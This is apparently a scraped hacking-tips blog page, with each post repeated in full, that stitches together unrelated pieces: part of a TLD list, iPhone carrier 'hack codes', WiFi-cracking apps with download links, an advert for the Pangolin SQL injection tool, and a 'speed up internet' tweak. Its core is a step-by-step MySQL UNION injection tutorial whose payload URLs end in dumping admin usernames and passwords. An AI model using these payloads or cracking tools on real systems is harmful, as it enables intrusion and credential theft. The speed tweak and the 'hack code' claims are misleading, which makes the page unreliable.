This is a TLD for companies, organizations, and individuals based in the region of Asia, Australia, and the Pacific.

.biz	
business	
This is an open TLD; any person or entity is permitted to register; however, registrations may be challenged later if they are not held by commercial entities in accordance with the domain’s charter. This TLD was created to provide relief for the wildly-popular .com TLD.

.cat	
Catalan	
This is a TLD for Web sites in the Catalan language or related to Catalan culture.

.com	
commercial	
This is an open TLD; any person or entity is permitted to register. Though originally intended for for-profit business entities, for a number of reasons it became the “main” TLD for domain names and is currently used by all types of entities including nonprofits, schools and private individuals. Domain name registrations may be challenged if the holder cannot prove an outside relation justifying reservation of the name, to prevent “squatting”.

.coop
cooperatives	
The .coop TLD is limited to cooperatives as defined by the Rochdale Principles.

.edu	
educational	
The .edu TLD is limited to specific educational institutions such as, but not limited to, primary schools, middle schools, secondary schools, colleges, and universities. In the US, its usability was limited in 2001 to post-secondary institutions accredited by an agency on the list of nationally recognized accrediting agencies maintained by the United States Department of Education. This domain is therefore almost exclusively used by U.S. colleges and universities. Some institutions that do not meet the current registration criteria havegrandfathered domain names.

.gov	
governmental	
The .gov TLD is limited to U.S. governmental entities and agencies.

.info	
information	
This is an open TLD; any person or entity is permitted to register.

.int	
international organizations	
The .int TLD is strictly limited to organizations, offices, and programs which are endorsed by a treaty between two or more nations.

.jobs	
companies	
The .jobs TLD is designed to be added after the names of established companies with jobs to advertise. At this time, owners of a “company.jobs” domain are not permitted to post jobs of third party employers.

.mil	
U.S. military	
The .mil TLD is limited to use by the U.S. military.

.mobi	
mobile devices	
Must be used for mobile-compatible sites in accordance with standards.

.museum	
museums	
Must be verified as a legitimate museum.

.name	
individuals, by name	
This is an open TLD; any person or entity is permitted to register; however, registrations may be challenged later if they are not by individuals (or the owners of fictional characters) in accordance with the domain’s charter.

.net	
network	
This is an open TLD; any person or entity is permitted to register. Originally intended for use by domains pointing to a distributed network of computers, or “umbrella” sites that act as the portal to a set of smaller websites.

.org	
organization	
This is an open TLD; any person or entity is permitted to register. Originally intended for use by non-profit organizations, and still primarily used by same.

.pro	
professions	
Currently, .pro is reserved for licensed or certified lawyers, accountants, physicians and engineers in France, Canada, NL, UK and the U.S. A professional seeking to register a .pro domain must provide their registrar with the appropriate credentials.

.tel	
Internet communication services	
A contact directory housing all types of contact information directly in the Domain Name System.

.travel	
travel and tourism industry related sites	
Must be verified as a legitimate travel-related entity.

.xxx	adult entertainment	
For sites providing sexually-explicit content.

Secret hack codes for iPhone 4 or 4S


Hello friends, today i am going to share all the available secret hack codes for iPhone 4 or iPhone 4S. These secret hack codes will help you to hack the iPhone and helps you to explore the internal settings of your iPhone.
Secret codes are actually those codes which are not known(hidden) to general users, usually Geeks use these codes as their shortcuts to browse the internal settings and perform their exploits. As we all know iPhone is quite secured and there are very less hack codes available for the same but don't worry Guys i come up with all the available hacking codes that works on iPhone 4 or 4S. You can also try these hack codes on previous models as i have tested them only of iPhone 4 and iPhone 4S. Some of them works on iPhone 4 and some on iPhone 4S and some are specific to operator. So please don't complain if any of them didn't work for you.. All codes are tested personally and are 100% working..

Secret hack codes for iPhone 4 or 4S
--------------------------------------------
Note: Some of codes will require tapping of call key on your iPhone, actually most of them require call button + tap(means slide it). So if any code doesn't work just by dialing, you just need to tap the call key and it will work. Infact except the IMEI number one hack code all require call + tap.


*#43#
Use to verify if call waiting is enabled

*#61#
Verify the number for unanswered calls

*#62#
Verify the number for call forwarding if no service is available.

*#67#
Verify the number for call forwarding if phone is busy

*#33#
To verify whether barring is enabled or disabled for outgoing

*#21#
To display the settings for your call forwarding

*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.

*#06#
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.

*225#
Displays the account balance for postpaid contracts.

*777#
Displays the account balance for prepaid accounts.

*646#
Displays the remaining minutes available.

*3282#
Get your data usage information.

*729
Options to make payments. Its operator specific.

611
Dials customer service, (114 in RSA for Vodacom). Its operator specific.

*#30#
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.

*#76#
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.
Note: This is the list of all iPhone codes available till now in market. If hope i haven't even missed the one. If still you are able to find any extra hack code for iPhone 4 or iPhone 4S then don't hesitate in sharing, as Sharing is Caring.
 
 

Photo: Secret hack codes for iPhone 4 or 4S
=========================

Hello friends, today i am going to share all the available secret hack codes for iPhone 4 or iPhone 4S. These secret hack codes will help you to hack the iPhone and helps you to explore the internal settings of your iPhone.

Secret codes are actually those codes which are not known(hidden) to general users, usually Geeks use these codes as their shortcuts to browse the internal settings and perform their exploits. As we all know iPhone is quite secured and there are very less hack codes available for the same but don't worry Guys i come up with all the available hacking codes that works on iPhone 4 or 4S.  You can also try these hack codes on previous models as i have tested them only of iPhone 4 and iPhone 4S. Some of them works on iPhone 4 and some on iPhone 4S and some are specific to operator. So please don't complain if any of them didn't work for you.. All codes are tested personally and are 100% working..

Secret hack codes for iPhone 4 or 4S
--------------------------------------------
Note: Some of codes will require tapping of call key on your iPhone, actually most of them require call button + tap(means slide it). So if any code doesn't work just by dialing, you just need to tap the call key and it will work. Infact except the IMEI number one hack code all require call + tap.


*#43#   
Use to verify if call waiting is enabled

*#61#  
Verify the number for unanswered calls

*#62#   
Verify the number for call forwarding if no service is available.

*#67#   
Verify the number for call forwarding if phone is busy

*#33#  
To verify whether barring is enabled or disabled for outgoing

*#21#   
To display the settings for your call forwarding

*3001#12345#*
Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone.

*#06#     
Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.

*225#    
Displays the account balance for postpaid contracts.

*777#     
Displays the account balance for prepaid accounts.

*646#     
Displays the remaining minutes available.

*3282#     
Get your data usage information.

*729     
Options to make payments. Its operator specific.

611     
Dials customer service, (114 in RSA for Vodacom). Its operator specific.

*#30#    
This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.

*#76#    
State whether the connected line presentation is enabled or disabled. Similar to the calling line presentation.

Note: This is the list of all iPhone codes available till now in market. If hope i haven't even missed the one. If still you are able to find any extra hack code for iPhone 4 or iPhone 4S then don't hesitate in sharing, as Sharing is Caring.

Four Best WiFi Cracking Applications For your Iphone


1. Aircrack-ng for IPhone:
--------------------------------
It is the simple command line with graphical interface software which is used to crack wifi networks . It sends packets to the wifi network and then cracks the password file of the network .It is used widely and can be downloaded from here.

http://www.filecrop.com/Aircrack-ng-for-iPhone.html

2. IWep Lite:
-----------------
It is an Iphone applications which let you crack wifi network in less than 30 minutes . It is easy in use and can be understood easily rather than Aircrack-ng . It is Graphical interface with best utility and dictionary . Apart from Aircrac-ng it uses dictionary and so it is less trustworthy than Aircrack and can not crack every key. It is used more widely than Aircrack but it uses dictionary that's why it is on 2nd number. It can be downloaded from here .

http://www.filecrop.com/iWep-Lite.ipa.html

3. WepGen:
---------------
WepGen is just another application which cracks the Wifi network by sending packets and it is rather easy in use than Aircrack but though it is on 3rd number due to it's popularity. It can be downloaded from here.

http://www.filecrop.com/wep-gen.ipa.html

4. IWifi Hack:
------------------
It works on the same scene as other cracking softwares except iweplite means it sends packets and break in the security of a wifi network . It is easy in use and can easily be used by anyone. It can be download from here.

http://www.filecrop.com/Iwifihack.ipa.html
 
 

Photo: Four Best WiFi Cracking Applications For your Iphone
===================================

 1. Aircrack-ng for IPhone:
--------------------------------
It is the simple command line with graphical interface software which is used to crack wifi networks . It sends packets to the wifi network and then cracks the password file of the network .It is used widely and can be downloaded from here.

http://www.filecrop.com/Aircrack-ng-for-iPhone.html

 2. IWep Lite:
-----------------
It is an Iphone applications which let you crack wifi network in less than 30 minutes . It is easy in use and can be understood easily rather than Aircrack-ng . It is Graphical interface with best utility and dictionary . Apart from Aircrac-ng it uses dictionary and so it is less trustworthy than Aircrack and can not crack every key. It is used more widely than Aircrack but it uses dictionary that's why it is on 2nd number. It can be downloaded from here .

http://www.filecrop.com/iWep-Lite.ipa.html

 3. WepGen:
---------------
WepGen is just another application which cracks the Wifi network by sending packets and it is rather easy in use than Aircrack but though it is on 3rd number due to it's popularity. It can be downloaded from here.

http://www.filecrop.com/wep-gen.ipa.html

 4. IWifi Hack:
------------------
It works on the same scene as other cracking softwares except iweplite means it sends packets and break in the security of a wifi network . It is easy in use and can easily be used by anyone. It can be download from here.

http://www.filecrop.com/Iwifihack.ipa.html

iPad’s Split Keyboard Has Six Hidden Keys For Your Convenience


Apple sneaks in some very subtle, yet incredibly useful features in iOS from time to time. One such feature comes bundled with the split keyboard for the iPad in iOS 5.0.1/iOS 5.

If you see the split keyboard, you’ll notice that the inner extremes of both the keyboard parts have some extra space left.

Turns out, this empty space actually houses extra keys according to the standard QWERTY layout, to play well with the typing practices of all users.

These duplicate keys let you tap an adjacent key on the other side of the split.

Such attention to fine detail is characteristic of Apple. Another, very similar, example of Apple playing around with the iOS keyboard buttons to add extra functionality is, the Siri dictation key on the iPhone 4S, which doubles up as a spacebar when typing.

Tip:
-----
Here’s how to enable the split keyboard:

>>Tap and hold on the keyboard button at the bottom right corner of your iPad’s keyboard (the one you generally tend to use for hide the keyboard).
>>You should get two options: Undock and Split.
>>Tap on Split to use the split keyboard.
 

Photo: iPad’s Split Keyboard Has Six Hidden Keys For Your Convenience
==========================================

Apple sneaks in some very subtle, yet incredibly useful features in iOS from time to time. One such feature comes bundled with the split keyboard for the iPad in iOS 5.0.1/iOS 5.

If you see the split keyboard, you’ll notice that the inner extremes of both the keyboard parts have some extra space left.

Turns out, this empty space actually houses extra keys according to the standard QWERTY layout, to play well with the typing practices of all users.

These duplicate keys let you tap an adjacent key on the other side of the split.

Such attention to fine detail is characteristic of Apple. Another, very similar, example of Apple playing around with the iOS keyboard buttons to add extra functionality is, the Siri dictation key on the iPhone 4S, which doubles up as a spacebar when typing.

Tip:
-----
Here’s how to enable the split keyboard:

>>Tap and hold on the keyboard button at the bottom right corner of your iPad’s keyboard (the one you generally tend to use for hide the keyboard).
>>You should get two options: Undock and Split.
>>Tap on Split to use the split keyboard.

Wednesday, February 6, 2013

SQL INJECTION TOOL -PANGOLIN


Pangolin is a penetration testing, SQL Injection test tool for database security. It finds SQL Injection vulnerabilities.Its goal is to detect and take inform you of SQL injection vulnerabilities in web applications. Once it detects an SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Database Support:
* Access: Informations (Database Path; Root Path; Drivers); Data
* MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
* MySql: Informations; Data; FileReader; FileWriter;
* Oracle: Inforatmions (Version; IP; Database; Accounts); Data;
* Informix: Informatons; Data
* DB2: Informatons; Data; and more;
* Sybase: Informatons; Data; and more;
* PostgreSQL: Informatons; Data; FileReader;
* Sqlite: Informatons; Data

Download Free Edition:
---------------------------
http://nosec.org/en/evaluate/
 

Photo: SQL INJECTION TOOL -PANGOLIN 
======================

Pangolin is a penetration testing, SQL Injection test tool for database security. It finds SQL Injection vulnerabilities.Its goal is to detect and take inform you of SQL injection vulnerabilities in web applications. Once it detects an SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

 Database Support:
* Access: Informations (Database Path; Root Path; Drivers); Data
* MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
* MySql: Informations; Data; FileReader; FileWriter;
* Oracle: Inforatmions (Version; IP; Database; Accounts); Data;
* Informix: Informatons; Data
* DB2: Informatons; Data; and more;
* Sybase: Informatons; Data; and more;
* PostgreSQL: Informatons; Data; FileReader;
* Sqlite: Informatons; Data

Download Free Edition:
---------------------------
http://nosec.org/en/evaluate/

How To Hack Websites , Mysql Injection

SQL Injection in MySQL Databases
----------------------------------------
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
----------
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2
---------
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3
--------
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4
---------
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:

user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5
---------
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
---------
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7
--------
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
 

Photo: How To Hack Websites , Mysql Injection
==========================

SQL Injection in MySQL Databases
----------------------------------------
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step  1:
----------
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.



Step 2
---------
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3
--------
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4
---------
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:

user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5
---------
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
---------
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7
--------
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Increase your internet speed


1: go to ur desktop
2: right click on "My computer"
3: den select "properties"
4: den click on "HARDWARE" tab
5: den click "Device manager"
6: now u see a new window(Device manager window)
7: look down now u can see "Ports(COM & LPT)" ...click on it
8:den double click on "Communication Ports"
9: after open u can see a "Communication Port properties"..
10: now go the "Port Setting"
11: and now change ur "Bits per second" to "128000".
12: and "Flow control" change 2 "Hardware".

apply and see the result.........
 

Photo: Increase your internet speed
===================

1: go to ur desktop
2: right click on "My computer"
3: den select "properties"
4: den click on "HARDWARE" tab
5: den click "Device manager"
6: now u see a new window(Device manager window)
7: look down now u can see "Ports(COM & LPT)" ...click on it
8:den double click on "Communication Ports"
9: after open u can see a "Communication Port properties"..
10: now go the "Port Setting"
11: and now change ur "Bits per second" to "128000".
12: and "Flow control" change 2 "Hardware".

apply and see the result.........